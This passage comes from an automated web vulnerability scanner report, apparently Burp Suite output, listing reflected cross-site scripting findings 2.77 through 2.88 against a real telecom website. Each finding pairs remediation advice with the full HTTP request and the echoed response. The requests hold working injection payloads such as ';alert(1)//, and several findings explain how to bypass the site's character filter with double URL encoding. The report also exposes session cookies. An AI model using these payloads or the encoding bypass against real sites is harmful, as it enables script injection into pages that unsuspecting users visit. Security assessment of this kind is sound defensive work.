$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrdering/CustomAppTabInfo/tabs.cssaeffb';alert(1)//9b1214b2e90');//]]>
...[SNIP]...
|
2.77. http://www.frontier.com/AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167 [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://www.frontier.com |
| Path: |
/AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167 |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34a38%2527%253balert%25281%2529%252f%252f6b3936757b1 was submitted in the REST URL parameter 1. This input was echoed as 34a38';alert(1)//6b3936757b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e116734a38%2527%253balert%25281%2529%252f%252f6b3936757b1 HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:35:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43791
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrderingcf4af'-alert(1)-'9ff1a208c26e116734a38';alert(1)//6b3936757b1');//]]>
...[SNIP]...
|
2.78. http://www.frontier.com/AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167 [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://www.frontier.com |
| Path: |
/AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167 |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 476a4'%3balert(1)//9376138f416 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 476a4';alert(1)//9376138f416 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167?476a4'%3balert(1)//9376138f416=1 HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43841
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrderingcf4af'-alert(1)-'9ff1a208c26e1167?476a4';alert(1)//9376138f416=1');//]]>
...[SNIP]...
|
2.79. http://www.frontier.com/AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167 [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://www.frontier.com |
| Path: |
/AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167 |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f242%2527%253balert%25281%2529%252f%252fa3ed4687c09 was submitted in the REST URL parameter 1. This input was echoed as 9f242';alert(1)//a3ed4687c09 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e11679f242%2527%253balert%25281%2529%252f%252fa3ed4687c09 HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:35:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43899
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrderingcf4af'-alert(document.location)-'9ff1a208c26e11679f242';alert(1)//a3ed4687c09');//]]>
...[SNIP]...
|
2.80. http://www.frontier.com/AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167 [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://www.frontier.com |
| Path: |
/AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167 |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0230'%3balert(1)//e42e942ef78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0230';alert(1)//e42e942ef78 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167?a0230'%3balert(1)//e42e942ef78=1 HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:35:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43949
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrderingcf4af'-alert(document.location)-'9ff1a208c26e1167?a0230';alert(1)//e42e942ef78=1');//]]>
...[SNIP]...
|
2.81. http://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://www.frontier.com |
| Path: |
/Controls/SharedWebMethods.aspx/GetCurrentLocale |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a972%2527%253balert%25281%2529%252f%252f878740809af was submitted in the REST URL parameter 2. This input was echoed as 4a972';alert(1)//878740809af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
POST /Controls/SharedWebMethods.aspx4a972%2527%253balert%25281%2529%252f%252f878740809af/GetCurrentLocale HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Content-Length: 12
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*
Pragma: no-cache
Cache-Control: no-cache
{'href': ''} |
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43839
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Controls/SharedWebMethods.aspx4a972';alert(1)//878740809af/GetCurrentLocale');//]]>
...[SNIP]...
|
2.82. http://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://www.frontier.com |
| Path: |
/Controls/VirtualCode.ashx |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7979'%3bfb5ed37a6ba was submitted in the REST URL parameter 1. This input was echoed as f7979';fb5ed37a6ba in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Controlsf7979'%3bfb5ed37a6ba/VirtualCode.ashx?pageid=73&origPath=%2ftopNav.css%2f HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D
|
Response (redirected)
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43359
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/Controlsf7979';fb5ed37a6ba/VirtualCode.ashx');//]]>
...[SNIP]...
|
2.83. http://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://www.frontier.com |
| Path: |
/Controls/VirtualCode.ashx |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb66e%2527%253balert%25281%2529%252f%252f3775dfb9153 was submitted in the REST URL parameter 2. This input was echoed as cb66e';alert(1)//3775dfb9153 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Controls/VirtualCode.ashxcb66e%2527%253balert%25281%2529%252f%252f3775dfb9153?pageid=73&origPath=%2ftopNav.css%2f HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43979
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Controls/VirtualCode.ashxcb66e';alert(1)//3775dfb9153?pageid=73&origPath=/topNav.css/');//]]>
...[SNIP]...
|
2.84. http://www.frontier.com/Images/Common/form_bg.gif [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://www.frontier.com |
| Path: |
/Images/Common/form_bg.gif |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3d86%2527%253balert%25281%2529%252f%252f44493412d91 was submitted in the REST URL parameter 1. This input was echoed as c3d86';alert(1)//44493412d91 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Imagesc3d86%2527%253balert%25281%2529%252f%252f44493412d91/Common/form_bg.gif HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Imagesc3d86';alert(1)//44493412d91/Common/form_bg.gif');//]]>
...[SNIP]...
|
2.85. http://www.frontier.com/Images/Common/form_bg.gif [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://www.frontier.com |
| Path: |
/Images/Common/form_bg.gif |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80d1c%2527%253balert%25281%2529%252f%252f47a4aeee6e7 was submitted in the REST URL parameter 2. This input was echoed as 80d1c';alert(1)//47a4aeee6e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Images/Common80d1c%2527%253balert%25281%2529%252f%252f47a4aeee6e7/form_bg.gif HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Images/Common80d1c';alert(1)//47a4aeee6e7/form_bg.gif');//]]>
...[SNIP]...
|
2.86. http://www.frontier.com/Images/Common/form_bg.gif [REST URL parameter 3]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://www.frontier.com |
| Path: |
/Images/Common/form_bg.gif |
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 970f4%2527%253balert%25281%2529%252f%252ff20c2fa2242 was submitted in the REST URL parameter 3. This input was echoed as 970f4';alert(1)//f20c2fa2242 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Images/Common/form_bg.gif970f4%2527%253balert%25281%2529%252f%252ff20c2fa2242 HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Images/Common/form_bg.gif970f4';alert(1)//f20c2fa2242');//]]>
...[SNIP]...
|
2.87. http://www.frontier.com/Images/Common/form_bg.gif [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://www.frontier.com |
| Path: |
/Images/Common/form_bg.gif |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b56f6'%3balert(1)//227d16cdf97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b56f6';alert(1)//227d16cdf97 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Images/Common/form_bg.gif?b56f6'%3balert(1)//227d16cdf97=1 HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43741
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Images/Common/form_bg.gif?b56f6';alert(1)//227d16cdf97=1');//]]>
...[SNIP]...
|
2.88. http://www.frontier.com/yahoo/fpsearchlg.asp [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://www.frontier.com |
| Path: |
/yahoo/fpsearchlg.asp |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17124%2527%253balert%25281%2529%252f%252fdf531ca5181 was submitted in the REST URL parameter 1. This input was echoed as 17124';alert(1)//df531ca5181 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /yahoo17124%2527%253balert%25281%2529%252f%252fdf531ca5181/fpsearchlg.asp?type=biz HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
